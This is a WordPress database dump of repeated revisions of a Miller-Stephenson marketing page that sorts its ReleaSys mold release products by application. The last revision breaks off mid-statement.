INSERT INTO `wp_posts` VALUES (4472, 2, '2017-06-07 15:20:44', '2017-06-07 15:20:44', '[section label="Media Left Large" bg_color="rgb(247, 247, 247)" bg_overlay="rgba(255, 255, 255, 0.85)" padding="0px"]\n\n[ux_banner height="400px" bg="4180" bg_overlay="rgba(0, 0, 0, 0.2)"]\n\n[text_box text_color="dark" hover="fade-out" width="36" scale="79" padding="5px 30px 10px 30px" position_x="95" position_y="95" bg="rgba(255, 255, 255, 0.94)" depth="4"]\n\n<p>Miller-Stephenson’s exclusive mold release product line, <strong>ReleaSys™</strong>, offers advanced chemistry and modern, eco-friendly formulations for the molding industry. Our products deliver superior value through their combination of innovative technology, ease of application and exceptional cost-effectiveness. However it is not always easy for engineers and plant managers to know which grade of <strong>ReleaSys™</strong> would perform best in their manufacturing operation. To help aid our customers we have simplified the selection process by consolidating our products into application specific sections below.</p>\n\n[/text_box]\n\n[/ux_banner]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4351" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Advanced Composites</h2>\n<p>Modern composites and fiber-reinforced materials demand innovative, efficient mold release solutions. Products for this application need to, adhere strongly to the mold surface, cure quickly and provide multiple releases per application with no contaminating transfer. <b>ReleaSys™ </b> technology provides a simple, yet sophisticated mold release chemistry for operators to employ. Application of only a single-coat of ReleaSys is required, no sealers or primers required.</p>\n[button text="ReleaSys™ 8900" link="https://www.miller-stephenson.com/product/urethane-mold-release-agent/" target="https://www.miller-stephenson.com/product/urethane-mold-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4360" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Rotational Plastics (Rotomolding)</h2>\n<p>Rotational Molding is a dynamic industry which utilizes an ever-widening variety of thermoplastic resins. In response to this evolution, Miller-Stephenson has developed a robust portfolio of specialized release agents. These formulations are tailored to meet rotational molding efficiency challenges such as shorter, hotter cycles and tight-tolereance, complex molds. Our <b>ReleaSys™ </b> product line binds strongly to the mold surface ensuring no transfer, impeccable surface finish, and multiple releases per application</p>\n[button text="ReleaSys™ RM" link="https://www.miller-stephenson.com/product/rotational-molding-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4366" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Polyurethane-TPU</h2>\n<p>Miller-Stephenson understands the demands of the polyurethane molding industry. The numerous variants of polyurethane(High Resiliency, Visco-Elastic, Spray Skin, Rigid and Flexible Foam, etc) make the demands on a release agent very high. Miller-Stephenson’s <b>ReleaSys™</b> release systems are specially formulated to deliver superior part release, cleaner molds, reduced build up, excellent surface cosmetics, and less downtime. Our high performance chemistry adheres tenaciously to mold surfaces such as aluminium, steel, urethane, epoxy, and fiberglass. ReleaSys provides the critical protection to your mold surface while delivering highly effective release properties.</p>\n[button text="ReleaSys™ 8800" link="https://www.miller-stephenson.com/product/composite-mold-release-agent/" target="https://www.miller-stephenson.com/product/composite-mold-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4387" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Rubber / Silicone / Elastomers</h2>\n<p>From Fluorosilicones to EPDM, Natural Rubber to Nitrile, and Miller-Stephenson has been delivering unmatched release performance to molders for over 50 years. Whether you are performing injection, compression or transfer molding, Miller-Stephenson’s <b>ReleaSys™</b> product line delivers ease of demolding, non-transferring, and numerous releases per application. Much of our advanced chemistry is water-based, low or no VOC, and low odor. Miller-Stephenson is dedicated to providing a cost-effective and efficient mold release for your application.</p>\n[button text="ReleaSys™ 8200" link="https://www.miller-stephenson.com/product/ptfe-water-based-release-agents/" target="https://www.miller-stephenson.com/product/ptfe-water-based-release-agents/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4332" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Injection Plastics Mold Release</h2>\n<p>There are numerous resins used in plastic injection molding,but regardless of the substrate, critical performance criteria exist for all mold release: Tenacious surface adhesion, protection of the mold surfaces, and superior part quality.Our <b>ReleaSys™</b> product line binds-to and protects even the most complex, highly polished molds, provides optimizes resin flow and generates higher part quality and lower scrap rates.</p>\n[button text="ReleaSys™ 9800" link="https://www.miller-stephenson.com/product/mold-release-coating/" target="https://www.miller-stephenson.com/product/mold-release-coating/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4337" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Fiberglass Mold Release</h2>\n<p>Miller-Stephenson delivers the most durable, highest performing mold release agents to the aerospace and fiberglass industries. Our products provide multiple releases, critical tooling protection, and no transfer with only a single application. No time-consuming mold priming or sealing required. Whether you are doing hand layup, spray layup, filament winding, etc <b>ReleaSys™</b> has a cost-effective, efficient solution for you.</p>\n[button text="ReleaSys™ 9900" link="https://www.miller-stephenson.com/product/releasys-9900-fiberglass-release-agent/" target="https://www.miller-stephenson.com/product/releasys-9900-fiberglass-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4391"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Pre-Cast / Reinformed Concrete</h2>\n<p>Miller-Stephenson has a developed a high-performance concrete release agent specifically designed for release of complex, challenging concrete mold designs. Our product minimizes/eliminates "bug-holes", provides high surface quality, consistent color pigmentation, and accurate replication of natural stone patterns. Most importantly, <b>ReleaSys™ CR </b> achieves all of this in a highly efficient and cost-effective system..</p>\n[button text="ReleaSys™ CR" link="https://www.miller-stephenson.com/product/concrete-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4430"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Custom Formulations</h2>\n<p>Didn\'t find your specific application? Miller-Stephenson\'s dynamic Engineering and Research Team can quickly address your application and develop a unique release agent solution.We understand that not every "off-the-shelf" product is right for each customer.Therefore we are ready and capable to develop a solution for you. Simple click on the button below and submit your request</p>\n[button text="Product InQuiry" link="https://www.miller-stephenson.com/tech-support/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n\n[/section]', 'Choosing ReleaSys™ By Application', '', 'inherit', 'closed', 'closed', '', '4321-revision-v1', '', '', '2017-06-07 15:20:44', '2017-06-07 15:20:44', '', 4321, 'https://www.miller-stephenson.com/4321-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4473, 2, '2017-06-07 15:24:10', '2017-06-07 15:24:10', '[section label="Media Left Large" bg_color="rgb(247, 247, 247)" bg_overlay="rgba(255, 255, 255, 0.85)" padding="0px"]\n\n[ux_banner height="400px" bg="4180" bg_overlay="rgba(0, 0, 0, 0.2)"]\n\n[text_box text_color="dark" hover="fade-out" width="36" scale="79" padding="5px 30px 10px 30px" position_x="95" position_y="95" bg="rgba(255, 255, 255, 0.94)" depth="4"]\n\n<p>Miller-Stephenson’s exclusive mold release product line, <strong>ReleaSys™</strong>, offers advanced chemistry and modern, eco-friendly formulations for the molding industry. Our products deliver superior value through their combination of innovative technology, ease of application and exceptional cost-effectiveness. However it is not always easy for engineers and plant managers to know which grade of <strong>ReleaSys™</strong> would perform best in their manufacturing operation. To help aid our customers we have simplified the selection process by consolidating our products into application specific sections below.</p>\n\n[/text_box]\n\n[/ux_banner]\n[divider align="center" width="500px"]\n\n[scroll_to title="Advanced Composites"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4351" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Advanced Composites</h2>\n<p>Modern composites and fiber-reinforced materials demand innovative, efficient mold release solutions. Products for this application need to, adhere strongly to the mold surface, cure quickly and provide multiple releases per application with no contaminating transfer. <b>ReleaSys™ </b> technology provides a simple, yet sophisticated mold release chemistry for operators to employ. Application of only a single-coat of ReleaSys is required, no sealers or primers required.</p>\n[button text="ReleaSys™ 8900" link="https://www.miller-stephenson.com/product/urethane-mold-release-agent/" target="https://www.miller-stephenson.com/product/urethane-mold-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4360" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Rotational Plastics (Rotomolding)</h2>\n<p>Rotational Molding is a dynamic industry which utilizes an ever-widening variety of thermoplastic resins. In response to this evolution, Miller-Stephenson has developed a robust portfolio of specialized release agents. These formulations are tailored to meet rotational molding efficiency challenges such as shorter, hotter cycles and tight-tolereance, complex molds. Our <b>ReleaSys™ </b> product line binds strongly to the mold surface ensuring no transfer, impeccable surface finish, and multiple releases per application</p>\n[button text="ReleaSys™ RM" link="https://www.miller-stephenson.com/product/rotational-molding-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4366" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Polyurethane-TPU</h2>\n<p>Miller-Stephenson understands the demands of the polyurethane molding industry. The numerous variants of polyurethane(High Resiliency, Visco-Elastic, Spray Skin, Rigid and Flexible Foam, etc) make the demands on a release agent very high. Miller-Stephenson’s <b>ReleaSys™</b> release systems are specially formulated to deliver superior part release, cleaner molds, reduced build up, excellent surface cosmetics, and less downtime. Our high performance chemistry adheres tenaciously to mold surfaces such as aluminium, steel, urethane, epoxy, and fiberglass. ReleaSys provides the critical protection to your mold surface while delivering highly effective release properties.</p>\n[button text="ReleaSys™ 8800" link="https://www.miller-stephenson.com/product/composite-mold-release-agent/" target="https://www.miller-stephenson.com/product/composite-mold-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4387" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Rubber / Silicone / Elastomers</h2>\n<p>From Fluorosilicones to EPDM, Natural Rubber to Nitrile, and Miller-Stephenson has been delivering unmatched release performance to molders for over 50 years. Whether you are performing injection, compression or transfer molding, Miller-Stephenson’s <b>ReleaSys™</b> product line delivers ease of demolding, non-transferring, and numerous releases per application. Much of our advanced chemistry is water-based, low or no VOC, and low odor. Miller-Stephenson is dedicated to providing a cost-effective and efficient mold release for your application.</p>\n[button text="ReleaSys™ 8200" link="https://www.miller-stephenson.com/product/ptfe-water-based-release-agents/" target="https://www.miller-stephenson.com/product/ptfe-water-based-release-agents/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4332" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Injection Plastics Mold Release</h2>\n<p>There are numerous resins used in plastic injection molding,but regardless of the substrate, critical performance criteria exist for all mold release: Tenacious surface adhesion, protection of the mold surfaces, and superior part quality.Our <b>ReleaSys™</b> product line binds-to and protects even the most complex, highly polished molds, provides optimizes resin flow and generates higher part quality and lower scrap rates.</p>\n[button text="ReleaSys™ 9800" link="https://www.miller-stephenson.com/product/mold-release-coating/" target="https://www.miller-stephenson.com/product/mold-release-coating/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4337" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Fiberglass Mold Release</h2>\n<p>Miller-Stephenson delivers the most durable, highest performing mold release agents to the aerospace and fiberglass industries. Our products provide multiple releases, critical tooling protection, and no transfer with only a single application. No time-consuming mold priming or sealing required. Whether you are doing hand layup, spray layup, filament winding, etc <b>ReleaSys™</b> has a cost-effective, efficient solution for you.</p>\n[button text="ReleaSys™ 9900" link="https://www.miller-stephenson.com/product/releasys-9900-fiberglass-release-agent/" target="https://www.miller-stephenson.com/product/releasys-9900-fiberglass-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4391"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Pre-Cast / Reinformed Concrete</h2>\n<p>Miller-Stephenson has a developed a high-performance concrete release agent specifically designed for release of complex, challenging concrete mold designs. Our product minimizes/eliminates "bug-holes", provides high surface quality, consistent color pigmentation, and accurate replication of natural stone patterns. Most importantly, <b>ReleaSys™ CR </b> achieves all of this in a highly efficient and cost-effective system..</p>\n[button text="ReleaSys™ CR" link="https://www.miller-stephenson.com/product/concrete-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4430"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Custom Formulations</h2>\n<p>Didn\'t find your specific application? Miller-Stephenson\'s dynamic Engineering and Research Team can quickly address your application and develop a unique release agent solution.We understand that not every "off-the-shelf" product is right for each customer.Therefore we are ready and capable to develop a solution for you. Simple click on the button below and submit your request</p>\n[button text="Product InQuiry" link="https://www.miller-stephenson.com/tech-support/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n\n[/section]', 'Choosing ReleaSys™ By Application', '', 'inherit', 'closed', 'closed', '', '4321-revision-v1', '', '', '2017-06-07 15:24:10', '2017-06-07 15:24:10', '', 4321, 'https://www.miller-stephenson.com/4321-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4474, 2, '2017-06-07 15:24:28', '2017-06-07 15:24:28', '[section label="Media Left Large" bg_color="rgb(247, 247, 247)" bg_overlay="rgba(255, 255, 255, 0.85)" padding="0px"]\n\n[ux_banner height="400px" bg="4180" bg_overlay="rgba(0, 0, 0, 0.2)"]\n\n[text_box text_color="dark" hover="fade-out" width="36" scale="79" padding="5px 30px 10px 30px" position_x="95" position_y="95" bg="rgba(255, 255, 255, 0.94)" depth="4"]\n\n<p>Miller-Stephenson’s exclusive mold release product line, <strong>ReleaSys™</strong>, offers advanced chemistry and modern, eco-friendly formulations for the molding industry. Our products deliver superior value through their combination of innovative technology, ease of application and exceptional cost-effectiveness. However it is not always easy for engineers and plant managers to know which grade of <strong>ReleaSys™</strong> would perform best in their manufacturing operation. To help aid our customers we have simplified the selection process by consolidating our products into application specific sections below.</p>\n\n[/text_box]\n\n[/ux_banner]\n[divider align="center" width="500px"]\n\n[scroll_to title="Advanced Composites"]\n\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4351" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Advanced Composites</h2>\n<p>Modern composites and fiber-reinforced materials demand innovative, efficient mold release solutions. Products for this application need to, adhere strongly to the mold surface, cure quickly and provide multiple releases per application with no contaminating transfer. <b>ReleaSys™ </b> technology provides a simple, yet sophisticated mold release chemistry for operators to employ. Application of only a single-coat of ReleaSys is required, no sealers or primers required.</p>\n[button text="ReleaSys™ 8900" link="https://www.miller-stephenson.com/product/urethane-mold-release-agent/" target="https://www.miller-stephenson.com/product/urethane-mold-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4360" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Rotational Plastics (Rotomolding)</h2>\n<p>Rotational Molding is a dynamic industry which utilizes an ever-widening variety of thermoplastic resins. In response to this evolution, Miller-Stephenson has developed a robust portfolio of specialized release agents. These formulations are tailored to meet rotational molding efficiency challenges such as shorter, hotter cycles and tight-tolereance, complex molds. Our <b>ReleaSys™ </b> product line binds strongly to the mold surface ensuring no transfer, impeccable surface finish, and multiple releases per application</p>\n[button text="ReleaSys™ RM" link="https://www.miller-stephenson.com/product/rotational-molding-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4366" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Polyurethane-TPU</h2>\n<p>Miller-Stephenson understands the demands of the polyurethane molding industry. The numerous variants of polyurethane(High Resiliency, Visco-Elastic, Spray Skin, Rigid and Flexible Foam, etc) make the demands on a release agent very high. Miller-Stephenson’s <b>ReleaSys™</b> release systems are specially formulated to deliver superior part release, cleaner molds, reduced build up, excellent surface cosmetics, and less downtime. Our high performance chemistry adheres tenaciously to mold surfaces such as aluminium, steel, urethane, epoxy, and fiberglass. ReleaSys provides the critical protection to your mold surface while delivering highly effective release properties.</p>\n[button text="ReleaSys™ 8800" link="https://www.miller-stephenson.com/product/composite-mold-release-agent/" target="https://www.miller-stephenson.com/product/composite-mold-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4387" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Rubber / Silicone / Elastomers</h2>\n<p>From Fluorosilicones to EPDM, Natural Rubber to Nitrile, and Miller-Stephenson has been delivering unmatched release performance to molders for over 50 years. Whether you are performing injection, compression or transfer molding, Miller-Stephenson’s <b>ReleaSys™</b> product line delivers ease of demolding, non-transferring, and numerous releases per application. Much of our advanced chemistry is water-based, low or no VOC, and low odor. Miller-Stephenson is dedicated to providing a cost-effective and efficient mold release for your application.</p>\n[button text="ReleaSys™ 8200" link="https://www.miller-stephenson.com/product/ptfe-water-based-release-agents/" target="https://www.miller-stephenson.com/product/ptfe-water-based-release-agents/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4332" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Injection Plastics Mold Release</h2>\n<p>There are numerous resins used in plastic injection molding,but regardless of the substrate, critical performance criteria exist for all mold release: Tenacious surface adhesion, protection of the mold surfaces, and superior part quality.Our <b>ReleaSys™</b> product line binds-to and protects even the most complex, highly polished molds, provides optimizes resin flow and generates higher part quality and lower scrap rates.</p>\n[button text="ReleaSys™ 9800" link="https://www.miller-stephenson.com/product/mold-release-coating/" target="https://www.miller-stephenson.com/product/mold-release-coating/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4337" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Fiberglass Mold Release</h2>\n<p>Miller-Stephenson delivers the most durable, highest performing mold release agents to the aerospace and fiberglass industries. Our products provide multiple releases, critical tooling protection, and no transfer with only a single application. No time-consuming mold priming or sealing required. Whether you are doing hand layup, spray layup, filament winding, etc <b>ReleaSys™</b> has a cost-effective, efficient solution for you.</p>\n[button text="ReleaSys™ 9900" link="https://www.miller-stephenson.com/product/releasys-9900-fiberglass-release-agent/" target="https://www.miller-stephenson.com/product/releasys-9900-fiberglass-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4391"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Pre-Cast / Reinformed Concrete</h2>\n<p>Miller-Stephenson has a developed a high-performance concrete release agent specifically designed for release of complex, challenging concrete mold designs. Our product minimizes/eliminates "bug-holes", provides high surface quality, consistent color pigmentation, and accurate replication of natural stone patterns. Most importantly, <b>ReleaSys™ CR </b> achieves all of this in a highly efficient and cost-effective system..</p>\n[button text="ReleaSys™ CR" link="https://www.miller-stephenson.com/product/concrete-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4430"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Custom Formulations</h2>\n<p>Didn\'t find your specific application? Miller-Stephenson\'s dynamic Engineering and Research Team can quickly address your application and develop a unique release agent solution.We understand that not every "off-the-shelf" product is right for each customer.Therefore we are ready and capable to develop a solution for you. Simple click on the button below and submit your request</p>\n[button text="Product InQuiry" link="https://www.miller-stephenson.com/tech-support/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n\n[/section]', 'Choosing ReleaSys™ By Application', '', 'inherit', 'closed', 'closed', '', '4321-revision-v1', '', '', '2017-06-07 15:24:28', '2017-06-07 15:24:28', '', 4321, 'https://www.miller-stephenson.com/4321-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4475, 2, '2017-06-07 15:34:34', '2017-06-07 15:34:34', '[button text="Advanced composites"]\n\n[button text="rotational plastics"]\n\n[button text="Polyurethane-TPU"]\n\n[button text="Rubber - Silicone- Elastomers"]\n\n[button text="injection plastics"]\n\n[button text="fiberglass molds"]\n\n[button text="pre-cast / reinformed concrete"]\n\n[button text="custom formulations"]\n\n[section label="Media Left Large" bg_color="rgb(247, 247, 247)" bg_overlay="rgba(255, 255, 255, 0.85)" padding="0px"]\n\n[ux_banner height="400px" bg="4180" bg_overlay="rgba(0, 0, 0, 0.2)"]\n\n[text_box text_color="dark" hover="fade-out" width="36" scale="79" padding="5px 30px 10px 30px" position_x="95" position_y="95" bg="rgba(255, 255, 255, 0.94)" depth="4"]\n\n<p>Miller-Stephenson’s exclusive mold release product line, <strong>ReleaSys™</strong>, offers advanced chemistry and modern, eco-friendly formulations for the molding industry. Our products deliver superior value through their combination of innovative technology, ease of application and exceptional cost-effectiveness. However it is not always easy for engineers and plant managers to know which grade of <strong>ReleaSys™</strong> would perform best in their manufacturing operation. To help aid our customers we have simplified the selection process by consolidating our products into application specific sections below.</p>\n\n[/text_box]\n\n[/ux_banner]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4351" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Advanced Composites</h2>\n<p>Modern composites and fiber-reinforced materials demand innovative, efficient mold release solutions. Products for this application need to, adhere strongly to the mold surface, cure quickly and provide multiple releases per application with no contaminating transfer. <b>ReleaSys™ </b> technology provides a simple, yet sophisticated mold release chemistry for operators to employ. Application of only a single-coat of ReleaSys is required, no sealers or primers required.</p>\n[button text="ReleaSys™ 8900" link="https://www.miller-stephenson.com/product/urethane-mold-release-agent/" target="https://www.miller-stephenson.com/product/urethane-mold-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4360" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Rotational Plastics (Rotomolding)</h2>\n<p>Rotational Molding is a dynamic industry which utilizes an ever-widening variety of thermoplastic resins. In response to this evolution, Miller-Stephenson has developed a robust portfolio of specialized release agents. These formulations are tailored to meet rotational molding efficiency challenges such as shorter, hotter cycles and tight-tolereance, complex molds. Our <b>ReleaSys™ </b> product line binds strongly to the mold surface ensuring no transfer, impeccable surface finish, and multiple releases per application</p>\n[button text="ReleaSys™ RM" link="https://www.miller-stephenson.com/product/rotational-molding-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4366" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Polyurethane-TPU</h2>\n<p>Miller-Stephenson understands the demands of the polyurethane molding industry. The numerous variants of polyurethane(High Resiliency, Visco-Elastic, Spray Skin, Rigid and Flexible Foam, etc) make the demands on a release agent very high. Miller-Stephenson’s <b>ReleaSys™</b> release systems are specially formulated to deliver superior part release, cleaner molds, reduced build up, excellent surface cosmetics, and less downtime. Our high performance chemistry adheres tenaciously to mold surfaces such as aluminium, steel, urethane, epoxy, and fiberglass. ReleaSys provides the critical protection to your mold surface while delivering highly effective release properties.</p>\n[button text="ReleaSys™ 8800" link="https://www.miller-stephenson.com/product/composite-mold-release-agent/" target="https://www.miller-stephenson.com/product/composite-mold-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4387" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Rubber / Silicone / Elastomers</h2>\n<p>From Fluorosilicones to EPDM, Natural Rubber to Nitrile, and Miller-Stephenson has been delivering unmatched release performance to molders for over 50 years. Whether you are performing injection, compression or transfer molding, Miller-Stephenson’s <b>ReleaSys™</b> product line delivers ease of demolding, non-transferring, and numerous releases per application. Much of our advanced chemistry is water-based, low or no VOC, and low odor. Miller-Stephenson is dedicated to providing a cost-effective and efficient mold release for your application.</p>\n[button text="ReleaSys™ 8200" link="https://www.miller-stephenson.com/product/ptfe-water-based-release-agents/" target="https://www.miller-stephenson.com/product/ptfe-water-based-release-agents/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4332" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Injection Plastics Mold Release</h2>\n<p>There are numerous resins used in plastic injection molding,but regardless of the substrate, critical performance criteria exist for all mold release: Tenacious surface adhesion, protection of the mold surfaces, and superior part quality.Our <b>ReleaSys™</b> product line binds-to and protects even the most complex, highly polished molds, provides optimizes resin flow and generates higher part quality and lower scrap rates.</p>\n[button text="ReleaSys™ 9800" link="https://www.miller-stephenson.com/product/mold-release-coating/" target="https://www.miller-stephenson.com/product/mold-release-coating/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4337" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Fiberglass Mold Release</h2>\n<p>Miller-Stephenson delivers the most durable, highest performing mold release agents to the aerospace and fiberglass industries. Our products provide multiple releases, critical tooling protection, and no transfer with only a single application. No time-consuming mold priming or sealing required. Whether you are doing hand layup, spray layup, filament winding, etc <b>ReleaSys™</b> has a cost-effective, efficient solution for you.</p>\n[button text="ReleaSys™ 9900" link="https://www.miller-stephenson.com/product/releasys-9900-fiberglass-release-agent/" target="https://www.miller-stephenson.com/product/releasys-9900-fiberglass-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row 